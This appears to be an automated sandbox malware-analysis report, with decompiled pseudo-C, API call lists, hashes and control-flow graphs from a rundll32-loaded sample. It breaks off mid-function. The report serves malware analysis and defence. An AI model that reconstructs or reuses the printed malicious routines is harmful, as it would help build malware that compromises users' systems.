                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 047B5468
                                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 047B5470
                                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 047B5480
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                          • String ID:
                                          • API String ID: 1295030180-0
                                          • Opcode ID: 87b5ec51afd939792159d3e116180657e2a54497930afc0ace46bfd40d9c73ce
                                          • Instruction ID: bf6d7cdcce960ce29605bae99c7ff60f1b47710043dbf0980fd1f600b3adc5aa
                                          • Opcode Fuzzy Hash: 87b5ec51afd939792159d3e116180657e2a54497930afc0ace46bfd40d9c73ce
                                          • Instruction Fuzzy Hash: FE213D75900259FFEB119FA4DC44EEEBB79EB48304F008465F550A6251C7759E05DFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 186 47b7c75-47b7c88 187 47b7c8f-47b7c93 StrChrA 186->187 188 47b7c8a-47b7c8e 187->188 189 47b7c95-47b7ca6 call 47b58be 187->189 188->187 192 47b7ceb 189->192 193 47b7ca8-47b7cb4 StrTrimA 189->193 195 47b7ced-47b7cf4 192->195 194 47b7cb6-47b7cbf StrChrA 193->194 196 47b7cd1-47b7cdd 194->196 197 47b7cc1-47b7ccb StrTrimA 194->197 196->194 198 47b7cdf-47b7ce9 196->198 197->196 198->195
                                          C-Code - Quality: 54%
                                          			E047B7C75(char* __eax) {
                                          				char* _t8;
                                          				intOrPtr _t12;
                                          				char* _t21;
                                          				signed int _t23;
                                          				char* _t24;
                                          				signed int _t26;
                                          				void* _t27;
                                          
                                          				_t21 = __eax;
                                          				_push(0x20);
                                          				_t23 = 1;
                                          				_push(__eax);
                                          				while(1) {
                                          					_t8 = StrChrA();
                                          					if(_t8 == 0) {
                                          						break;
                                          					}
                                          					_t23 = _t23 + 1;
                                          					_push(0x20);
                                          					_push( &(_t8[1]));
                                          				}
                                          				_t12 = E047B58BE(_t23 << 2);
                                          				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
                                          				if(_t12 != 0) {
                                          					StrTrimA(_t21, 0x47bc28c); // executed
                                          					_t26 = 0;
                                          					do {
                                          						_t24 = StrChrA(_t21, 0x20);
                                          						if(_t24 != 0) {
                                          							 *_t24 = 0;
                                          							_t24 =  &(_t24[1]);
                                          							StrTrimA(_t24, 0x47bc28c);
                                          						}
                                          						_t2 = _t27 + 0x10; // 0x4d283a53
                                          						 *( *_t2 + _t26 * 4) = _t21;
                                          						_t26 = _t26 + 1;
                                          						_t21 = _t24;
                                          					} while (_t24 != 0);
                                          					_t6 = _t27 + 0x10; // 0x4d283a53
                                          					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *_t6;
                                          				}
                                          				return 0;
                                          			}

                                          APIs
                                          • StrChrA.SHLWAPI(?,00000020,00000000,06CB95AC,?,?,?,047B4C85,06CB95AC,?,?,?,047B4A8B,?,?,?), ref: 047B7C8F
                                          • StrTrimA.KERNELBASE(?,047BC28C,00000002,?,?,?,047B4C85,06CB95AC,?,?,?,047B4A8B,?,?,?,4D283A53), ref: 047B7CAE
                                          • StrChrA.SHLWAPI(?,00000020,?,?,?,047B4C85,06CB95AC,?,?,?,047B4A8B,?,?,?,4D283A53,?), ref: 047B7CB9
                                          • StrTrimA.SHLWAPI(00000001,047BC28C,?,?,?,047B4C85,06CB95AC,?,?,?,047B4A8B,?,?,?,4D283A53,?), ref: 047B7CCB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Trim
                                          • String ID: S:(M
                                          • API String ID: 3043112668-2217774225
                                          • Opcode ID: a2c3f26d228fcbc409e60a0d5a0e871bdb75584653fd1202bc417a5aa3a4672c
                                          • Instruction ID: bbbf7c6c031a83b76bbff1ca0264c936ed8c7033b24da2e33c87e58e36f0aaec
                                          • Opcode Fuzzy Hash: a2c3f26d228fcbc409e60a0d5a0e871bdb75584653fd1202bc417a5aa3a4672c
                                          • Instruction Fuzzy Hash: 0501B5716053166FD2369E658D48FBBBF9CEB85A50F11451CF8C1D7340DB60E80596F0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 199 47b4908-47b4922 call 47b11af 202 47b4938-47b4946 199->202 203 47b4924-47b4932 199->203 205 47b4958-47b4973 call 47b1111 202->205 206 47b4948-47b494b 202->206 203->202 212 47b497d 205->212 213 47b4975-47b497b 205->213 206->205 207 47b494d-47b4952 206->207 207->205 209 47b4adb 207->209 211 47b4add-47b4ae2 209->211 214 47b4983-47b4998 call 47b1ec4 call 47b1a4e 212->214 213->214 219 47b499a-47b499d CloseHandle 214->219 220 47b49a3-47b49a9 214->220 219->220 221 47b49ab-47b49b0 220->221 222 47b49cf-47b49e7 call 47b58be 220->222 223 47b4ac6-47b4acb 221->223 224 47b49b6 221->224 231 47b49e9-47b4a11 memset RtlInitializeCriticalSection 222->231 232 47b4a13-47b4a15 222->232 226 47b4acd-47b4ad1 223->226 227 47b4ad3-47b4ad9 223->227 228 47b49b9-47b49c8 call 47b7827 224->228 226->211 226->227 227->211 237 47b49ca 228->237 233 47b4a16-47b4a1a 231->233 232->233 233->223 236 47b4a20-47b4a36 RtlAllocateHeap 233->236 238 47b4a38-47b4a64 wsprintfA 236->238 239 47b4a66-47b4a68 236->239 237->223 240 47b4a69-47b4a6d 238->240 239->240 240->223 241 47b4a6f-47b4a8f call 47b93d5 call 47b98f7 240->241 241->223 246 47b4a91-47b4a98 call 47b205b 241->246 249 47b4a9a-47b4a9d 246->249 250 47b4a9f-47b4aa6 246->250 249->223 251 47b4abb-47b4abf call 47b9b6f 250->251 252 47b4aa8-47b4aaa 250->252 256 47b4ac4 251->256 252->223 253 47b4aac-47b4ab0 call 47b6cd3 252->253 257 47b4ab5-47b4ab9 253->257 256->223 257->223 257->251
                                          C-Code - Quality: 57%
                                          			E047B4908(signed int __edx) {
                                          				signed int _v8;
                                          				long _v12;
                                          				CHAR* _v16;
                                          				long _v20;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* _t21;
                                          				CHAR* _t22;
                                          				CHAR* _t25;
                                          				intOrPtr _t26;
                                          				void* _t27;
                                          				void* _t31;
                                          				void* _t32;
                                          				CHAR* _t36;
                                          				CHAR* _t42;
                                          				CHAR* _t43;
                                          				CHAR* _t44;
                                          				CHAR* _t46;
                                          				void* _t49;
                                          				void* _t51;
                                          				signed char _t56;
                                          				intOrPtr _t58;
                                          				signed int _t59;
                                          				void* _t63;
                                          				CHAR* _t67;
                                          				CHAR* _t68;
                                          				char* _t69;
                                          				void* _t70;
                                          
                                          				_t61 = __edx;
                                          				_v20 = 0;
                                          				_v8 = 0;
                                          				_v12 = 0;
                                          				_t21 = E047B11AF();
                                          				if(_t21 != 0) {
                                          					_t59 =  *0x47bd25c; // 0x4000000a
                                          					_t55 = (_t59 & 0xf0000000) + _t21;
                                          					 *0x47bd25c = (_t59 & 0xf0000000) + _t21;
                                          				}
                                          				_t22 =  *0x47bd164(0, 2);
                                          				_v16 = _t22;
                                          				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                          					_t25 = E047B1111( &_v8,  &_v20); // executed
                                          					_t54 = _t25;
                                          					_t26 =  *0x47bd2a4; // 0x24fa5a8
                                          					if( *0x47bd25c > 5) {
                                          						_t8 = _t26 + 0x47be5cd; // 0x4d283a53
                                          						_t27 = _t8;
                                          					} else {
                                          						_t7 = _t26 + 0x47bea05; // 0x44283a44
                                          						_t27 = _t7;
                                          					}
                                          					E047B1EC4(_t27, _t27);
                                          					_t31 = E047B1A4E(_t61,  &_v20,  &_v12); // executed
                                          					if(_t31 == 0) {
                                          						CloseHandle(_v20);
                                          					}
                                          					_t63 = 5;
                                          					if(_t54 != _t63) {
                                          						 *0x47bd270 =  *0x47bd270 ^ 0x81bbe65d;
                                          						_t32 = E047B58BE(0x60);
                                          						 *0x47bd324 = _t32;
                                          						__eflags = _t32;
                                          						if(_t32 == 0) {
                                          							_push(8);
                                          							_pop(0);
                                          						} else {
                                          							memset(_t32, 0, 0x60);
                                          							_t49 =  *0x47bd324; // 0x6cb95b0
                                          							_t70 = _t70 + 0xc;
                                          							__imp__(_t49 + 0x40);
                                          							_t51 =  *0x47bd324; // 0x6cb95b0
                                          							 *_t51 = 0x47be845;
                                          						}
                                          						_t54 = 0;
                                          						__eflags = 0;
                                          						if(0 == 0) {
                                          							_t36 = RtlAllocateHeap( *0x47bd238, 0, 0x43);
                                          							 *0x47bd2c4 = _t36;
                                          							__eflags = _t36;
                                          							if(_t36 == 0) {
                                          								_push(8);
                                          								_pop(0);
                                          							} else {
                                          								_t56 =  *0x47bd25c; // 0x4000000a
                                          								_t61 = _t56 & 0x000000ff;
                                          								_t58 =  *0x47bd2a4; // 0x24fa5a8
                                          								_t13 = _t58 + 0x47be55a; // 0x697a6f4d
                                          								_t55 = _t13;
                                          								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x47bc28f);
                                          							}
                                          							_t54 = 0;
                                          							__eflags = 0;
                                          							if(0 == 0) {
                                          								asm("sbb eax, eax");
                                          								E047B93D5( ~_v8 &  *0x47bd270, 0x47bd00c); // executed
                                          								_t42 = E047B98F7(0, _t55, _t63, 0x47bd00c); // executed
                                          								_t54 = _t42;
                                          								__eflags = _t54;
                                          								if(_t54 != 0) {
                                          									goto L30;
                                          								}
                                          								_t43 = E047B205B(_t55); // executed
                                          								__eflags = _t43;
                                          								if(_t43 != 0) {
                                          									__eflags = _v8;
                                          									_t67 = _v12;
                                          									if(_v8 != 0) {
                                          										L29:
                                          										_t44 = E047B9B6F(_t61, _t67, _v8); // executed
                                          										_t54 = _t44;
                                          										goto L30;
                                          									}
                                          									__eflags = _t67;
                                          									if(__eflags == 0) {
                                          										goto L30;
                                          									}
                                          									_t46 = E047B6CD3(__eflags,  &(_t67[4])); // executed
                                          									_t54 = _t46;
                                          									__eflags = _t54;
                                          									if(_t54 == 0) {
                                          										goto L30;
                                          									}
                                          									goto L29;
                                          								}
                                          								_t54 = 8;
                                          							}
                                          						}
                                          					} else {
                                          						_t68 = _v12;
                                          						if(_t68 == 0) {
                                          							L30:
                                          							if(_v16 == 0 || _v16 == 1) {
                                          								 *0x47bd160();
                                          							}
                                          							goto L34;
                                          						}
                                          						_t69 =  &(_t68[4]);
                                          						do {
                                          						} while (E047B7827(_t63, _t69, 0, 1) == 0x4c7);
                                          					}
                                          					goto L30;
                                          				} else {
                                          					_t54 = _t22;
                                          					L34:
                                          					return _t54;
                                          				}
                                          			}

                                          APIs
                                            • Part of subcall function 047B11AF: GetModuleHandleA.KERNEL32(4C44544E,00000000,047B4920,00000001), ref: 047B11BE
                                          • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 047B499D
                                            • Part of subcall function 047B58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,047B1C51), ref: 047B58CA
                                          • memset.NTDLL ref: 047B49ED
                                          • RtlInitializeCriticalSection.NTDLL(06CB9570), ref: 047B49FE
                                            • Part of subcall function 047B6CD3: memset.NTDLL ref: 047B6CED
                                            • Part of subcall function 047B6CD3: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 047B6D24
                                            • Part of subcall function 047B6CD3: StrCmpNIW.SHLWAPI(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,047B4AB5), ref: 047B6D2F
                                          • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 047B4A29
                                          • wsprintfA.USER32 ref: 047B4A59
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                          • String ID:
                                          • API String ID: 4246211962-0
                                          • Opcode ID: 311be118bb56b738ce99a34f76d607264b2b7d79553b8b11b7fea6d75f7c8fdc
                                          • Instruction ID: 57241e0b3b9502e2593d11924b85484dcfd1c300575444f9cba670237284f9fc
                                          • Opcode Fuzzy Hash: 311be118bb56b738ce99a34f76d607264b2b7d79553b8b11b7fea6d75f7c8fdc
                                          • Instruction Fuzzy Hash: 5D51A671A00615AFEB31EBA4DD48FEE77A8EB04B04F148525E581E7382E778F9048BD4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 90%
                                          			E047B6CD3(void* __eflags, WCHAR* _a4) {
                                          				char _v40;
                                          				char _v44;
                                          				void _v48;
                                          				int _v52;
                                          				char _v56;
                                          				char _v60;
                                          				void* _v64;
                                          				char _v68;
                                          				intOrPtr _v72;
                                          				int _v76;
                                          				WCHAR* _v84;
                                          				intOrPtr _v88;
                                          				intOrPtr _v92;
                                          				char _v96;
                                          				void* __ebx;
                                          				void* __esi;
                                          				intOrPtr _t40;
                                          				int _t45;
                                          				char _t50;
                                          				intOrPtr _t52;
                                          				void* _t55;
                                          				intOrPtr _t67;
                                          				void* _t70;
                                          				void* _t81;
                                          				WCHAR* _t90;
                                          
                                          				_v52 = 0;
                                          				memset( &_v48, 0, 0x2c);
                                          				_v76 = 0;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_t40 =  *0x47bd2a4; // 0x24fa5a8
                                          				_t5 = _t40 + 0x47bee24; // 0x410025
                                          				_t90 = E047B4814(_t5);
                                          				_v84 = _t90;
                                          				if(_t90 == 0) {
                                          					_t81 = 8;
                                          					L24:
                                          					return _t81;
                                          				}
                                          				_t45 = StrCmpNIW(_t90, _a4, lstrlenW(_t90)); // executed
                                          				if(_t45 != 0) {
                                          					_t81 = 1;
                                          					L22:
                                          					E047B147E(_v88);
                                          					goto L24;
                                          				}
                                          				if(E047B9138(0,  &_v96) != 0) {
                                          					_v96 = 0;
                                          				}
                                          				_t50 = E047BA5E9(0,  *0x47bd33c);
                                          				_v96 = _t50;
                                          				if(_t50 == 0) {
                                          					_t81 = 8;
                                          					goto L19;
                                          				} else {
                                          					_t52 =  *0x47bd2a4; // 0x24fa5a8
                                          					_t11 = _t52 + 0x47be81a; // 0x65696c43
                                          					_t55 = E047BA5E9(0, _t11);
                                          					_t93 = _t55;
                                          					if(_t55 == 0) {
                                          						_t81 = 8;
                                          					} else {
                                          						_t81 = E047B74B9(_v96, 0x80000001, _v92, _t93,  &_v60,  &_v56);
                                          						E047B147E(_t93);
                                          					}
                                          					if(_t81 != 0) {
                                          						L17:
                                          						E047B147E(_v92);
                                          						L19:
                                          						_t92 = _v96;
                                          						if(_v96 != 0) {
                                          							E047B568A(_t92);
                                          						}
                                          						goto L22;
                                          					} else {
                                          						if(( *0x47bd260 & 0x00000001) == 0) {
                                          							L14:
                                          							E047B6E92(_t81, _v60, _v56,  *0x47bd270, 0);
                                          							_t81 = E047B6737(_v72,  &_v64,  &_v60, 0);
                                          							if(_t81 == 0) {
                                          								_v68 = _v96;
                                          								_v64 =  &_v60;
                                          								_t81 = E047B72F2( &_v84, 0);
                                          							}
                                          							E047B147E(_v60);
                                          							goto L17;
                                          						}
                                          						_t67 =  *0x47bd2a4; // 0x24fa5a8
                                          						_t18 = _t67 + 0x47be823; // 0x65696c43
                                          						_t70 = E047BA5E9(0, _t18);
                                          						_t95 = _t70;
                                          						if(_t70 == 0) {
                                          							_t81 = 8;
                                          						} else {
                                          							_t22 =  &_v96; // 0x65696c43
                                          							_t81 = E047B74B9( *_t22, 0x80000001, _v92, _t95,  &_v44,  &_v40);
                                          							E047B147E(_t95);
                                          						}
                                          						if(_t81 != 0) {
                                          							goto L17;
                                          						} else {
                                          							goto L14;
                                          						}
                                          					}
                                          				}
                                          			}

                                          APIs
                                          • memset.NTDLL ref: 047B6CED
                                            • Part of subcall function 047B4814: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,047B6D15,00410025,00000005,?,00000000), ref: 047B4825
                                            • Part of subcall function 047B4814: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 047B4842
                                          • lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 047B6D24
                                          • StrCmpNIW.SHLWAPI(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,047B4AB5), ref: 047B6D2F
                                          Strings
                                          Similarity
                                          • API ID: EnvironmentExpandStrings$lstrlenmemset
                                          • String ID: Clie
                                          • API String ID: 3817122888-1624203186
                                          • Opcode ID: 3a6fdb8624939c454ebc75e598a4dae6eb2ebb11586a129d7d5601b6386cdc06
                                          • Instruction ID: ec16201ce3429c47a60f23b32fe81c47b87fcfb8bb85a5a2301c187403a8a957
                                          • Opcode Fuzzy Hash: 3a6fdb8624939c454ebc75e598a4dae6eb2ebb11586a129d7d5601b6386cdc06
                                          • Instruction Fuzzy Hash: 14415D72204355AFE710AEA4DC88FEF77E8EF44618F40892ABAC4D6210D675E90487D2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 314 47b4ffa-47b503c 316 47b50c3-47b50c9 314->316 317 47b5042-47b504b 314->317 318 47b504d-47b505e SysAllocString 317->318 319 47b508c-47b508f 317->319 322 47b5069-47b5081 318->322 323 47b5060-47b5067 318->323 320 47b50ed 319->320 321 47b5091-47b50a1 SysAllocString 319->321 326 47b50ef-47b50f2 320->326 324 47b50cc-47b50eb 321->324 325 47b50a3 321->325 331 47b5085-47b508a 322->331 327 47b50b5-47b50b8 323->327 324->326 328 47b50aa-47b50ac 325->328 326->328 330 47b50f4-47b5101 326->330 327->316 329 47b50ba-47b50bd SysFreeString 327->329 328->327 332 47b50ae-47b50af SysFreeString 328->332 329->316 330->316 331->319 331->327 332->327
                                          APIs
                                          • SysAllocString.OLEAUT32(80000002), ref: 047B5057
                                          • SysAllocString.OLEAUT32(047BA6F4), ref: 047B509B
                                          • SysFreeString.OLEAUT32(00000000), ref: 047B50AF
                                          • SysFreeString.OLEAUT32(00000000), ref: 047B50BD
                                          Similarity
                                          • API ID: String$AllocFree
                                          • String ID:
                                          • API String ID: 344208780-0
                                          • Opcode ID: 2907e7360094c1f876d1c75c1680d6583631acb19eccd51119a05511c375621d
                                          • Instruction ID: 23b94598de1cfe6b735f903e6b11ddc551520acd69078ddf2eaeb3f487d6b1b8
                                          • Opcode Fuzzy Hash: 2907e7360094c1f876d1c75c1680d6583631acb19eccd51119a05511c375621d
                                          • Instruction Fuzzy Hash: D331FC7190064ABFCB15DFA8D8C4AEE7BB9EF48304B10882EF54597250E775A941CBE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 334 47b90a1-47b90b7 HeapCreate 335 47b90b9-47b90bc 334->335 336 47b90be-47b90d4 GetTickCount call 47b6a7f 334->336 337 47b911c 335->337 336->337 340 47b90d6-47b90d7 336->340 341 47b90d8-47b9100 SwitchToThread call 47b1c04 Sleep 340->341 344 47b9102-47b910b call 47b9511 341->344 347 47b910d 344->347 348 47b9117 call 47b4908 344->348 347->348 348->337
                                          C-Code - Quality: 100%
                                          			E047B90A1(signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                          				void* _t5;
                                          				void* _t7;
                                          				void* _t10;
                                          				void* _t13;
                                          				void* _t14;
                                          				void* _t15;
                                          				signed int _t16;
                                          				signed int _t22;
                                          
                                          				_t16 = __edx;
                                          				_t5 = HeapCreate(0, 0x400000, 0); // executed
                                          				 *0x47bd238 = _t5;
                                          				if(_t5 == 0) {
                                          					_t14 = 8;
                                          					return _t14;
                                          				}
                                          				 *0x47bd1a8 = GetTickCount();
                                          				_t7 = E047B6A7F(_a4);
                                          				if(_t7 == 0) {
                                          					do {
                                          						_t22 = SwitchToThread() + 8;
                                          						_t10 = E047B1C04(_a4, _t22);
                                          						Sleep(0x20 + _t22 * 4); // executed
                                          					} while (_t10 == 1);
                                          					if(E047B9511(_t15) != 0) {
                                          						 *0x47bd260 = 1; // executed
                                          					}
                                          					_t13 = E047B4908(_t16); // executed
                                          					return _t13;
                                          				}
                                          				return _t7;
                                          			}












                                          APIs
                                          • HeapCreate.KERNEL32(00000000,00400000,00000000,047B6F11,?), ref: 047B90AA
                                          • GetTickCount.KERNEL32 ref: 047B90BE
                                          • SwitchToThread.KERNEL32(?,00000001,?), ref: 047B90D8
                                          • Sleep.KERNEL32(00000000,-00000008,?,00000001,?), ref: 047B90F7
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: CountCreateHeapSleepSwitchThreadTick
                                          • String ID:
                                          • API String ID: 377297877-0
                                          • Opcode ID: 47696e232d59db8876cee31df2be433dc34a50f6f8707284b1587325ac203f9e
                                          • Instruction ID: 6fd5c92224a30de68c79e325025d5d13a5236dbd1260dcf669cdb150ddd56c86
                                          • Opcode Fuzzy Hash: 47696e232d59db8876cee31df2be433dc34a50f6f8707284b1587325ac203f9e
                                          • Instruction Fuzzy Hash: FBF0C2F1600615AFEB216B749D0CFDA3BA4EF44359F00C425EB94D6340EB38E80086E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 350 47b68cf-47b68e9 call 47b9138 353 47b68eb 350->353 354 47b68ee-47b6907 call 47b1b13 350->354 353->354 356 47b690c-47b6910 354->356 357 47b69cf-47b69d4 356->357 358 47b6916-47b6930 StrToIntExW 356->358 359 47b69db-47b69e1 357->359 360 47b69d6 call 47b568a 357->360 361 47b69bf-47b69c1 358->361 362 47b6936-47b6952 call 47b5fcb 358->362 360->359 365 47b69c2-47b69cd HeapFree 361->365 362->365 367 47b6954-47b696d call 47b75e7 362->367 365->357 370 47b698f-47b69bd call 47b1bc1 HeapFree 367->370 371 47b696f-47b6976 367->371 370->365 371->370 372 47b6978-47b698a call 47b75e7 371->372 372->370
                                          C-Code - Quality: 100%
                                          			E047B68CF() {
                                          				void* _v8;
                                          				int _v12;
                                          				WCHAR* _v16;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* _t23;
                                          				intOrPtr _t24;
                                          				void* _t26;
                                          				intOrPtr _t32;
                                          				intOrPtr _t35;
                                          				intOrPtr _t38;
                                          				intOrPtr _t42;
                                          				void* _t45;
                                          				void* _t51;
                                          
                                          				_v12 = 0;
                                          				_t23 = E047B9138(0,  &_v8); // executed
                                          				if(_t23 != 0) {
                                          					_v8 = 0;
                                          				}
                                          				_t24 =  *0x47bd2a4; // 0x24fa5a8
                                          				_t4 = _t24 + 0x47bede0; // 0x6cb9388
                                          				_t5 = _t24 + 0x47bed88; // 0x4f0053
                                          				_t26 = E047B1B13( &_v16, _v8, _t5, _t4); // executed
                                          				_t45 = _t26;
                                          				if(_t45 == 0) {
                                          					StrToIntExW(_v16, 0,  &_v12);
                                          					_t45 = 8;
                                          					if(_v12 < _t45) {
                                          						_t45 = 1;
                                          						__eflags = 1;
                                          					} else {
                                          						_t32 =  *0x47bd2a4; // 0x24fa5a8
                                          						_t11 = _t32 + 0x47bedd4; // 0x6cb937c
                                          						_t48 = _t11;
                                          						_t12 = _t32 + 0x47bed88; // 0x4f0053
                                          						_t51 = E047B5FCB(_t11, _t12, _t11);
                                          						_t58 = _t51;
                                          						if(_t51 != 0) {
                                          							_t35 =  *0x47bd2a4; // 0x24fa5a8
                                          							_t13 = _t35 + 0x47bea59; // 0x30314549
                                          							if(E047B75E7(_t48, _t58, _v8, _t51, _t13, 0x14) == 0) {
                                          								_t60 =  *0x47bd25c - 6;
                                          								if( *0x47bd25c <= 6) {
                                          									_t42 =  *0x47bd2a4; // 0x24fa5a8
                                          									_t15 = _t42 + 0x47bec3a; // 0x52384549
                                          									E047B75E7(_t48, _t60, _v8, _t51, _t15, 0x13);
                                          								}
                                          							}
                                          							_t38 =  *0x47bd2a4; // 0x24fa5a8
                                          							_t17 = _t38 + 0x47bee18; // 0x6cb93c0
                                          							_t18 = _t38 + 0x47bedf0; // 0x680043
                                          							_t45 = E047B1BC1(_v8, 0x80000001, _t51, _t18, _t17);
                                          							HeapFree( *0x47bd238, 0, _t51);
                                          						}
                                          					}
                                          					HeapFree( *0x47bd238, 0, _v16);
                                          				}
                                          				_t53 = _v8;
                                          				if(_v8 != 0) {
                                          					E047B568A(_t53);
                                          				}
                                          				return _t45;
                                          			}


















                                          APIs
                                          • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,06CB9388,00000000,?,7519F710,00000000,7519F730), ref: 047B691E
                                          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,06CB93C0,?,00000000,30314549,00000014,004F0053,06CB937C), ref: 047B69BB
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,047B9C10), ref: 047B69CD
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: bde4191e7c786f7ff9d0d322cdf1b42028e86fe9b25d924aecbf02d85850e17c
                                          • Instruction ID: a46997420f94274694f886acbcc70a8e707ad92ecd8f16717f6472139aa81d54
                                          • Opcode Fuzzy Hash: bde4191e7c786f7ff9d0d322cdf1b42028e86fe9b25d924aecbf02d85850e17c
                                          • Instruction Fuzzy Hash: 9A318C72A00149BEEB21AB94DD88FDA7BBDEB44754F058069F644AB210D674EA04DBD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 376 47b9f11-47b9f39 377 47b9f3b-47b9f43 RtlAllocateHeap 376->377 378 47b9f59-47b9f61 RtlAllocateHeap 376->378 379 47b9f79-47b9f7b 377->379 380 47b9f45-47b9f52 call 47b1754 377->380 378->379 381 47b9f63-47b9f70 call 47b514f 378->381 383 47b9f7c-47b9f7e 379->383 388 47b9f57 380->388 385 47b9f75-47b9f77 381->385 386 47b9fbc 383->386 387 47b9f80-47b9fa1 call 47b7cf7 call 47b60cf 383->387 385->383 390 47b9fc2-47b9fc8 386->390 394 47b9fcb-47b9fdc 387->394 395 47b9fa3-47b9fb6 call 47b6106 HeapFree 387->395 388->385 394->390 397 47b9fde-47b9fe5 394->397 395->386 397->390
                                          C-Code - Quality: 58%
                                          			E047B9F11(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                          				void* _v8;
                                          				void* __edi;
                                          				intOrPtr _t19;
                                          				void* _t25;
                                          				void* _t31;
                                          				void* _t37;
                                          				void* _t41;
                                          				intOrPtr _t43;
                                          				void* _t44;
                                          
                                          				_t37 = __edx;
                                          				_t33 = __ecx;
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t43 =  *0x47bd2a4; // 0x24fa5a8
                                          				_push(0x800);
                                          				_push(0);
                                          				_push( *0x47bd238);
                                          				_t1 = _t43 + 0x47be791; // 0x6976612e
                                          				_t44 = _t1;
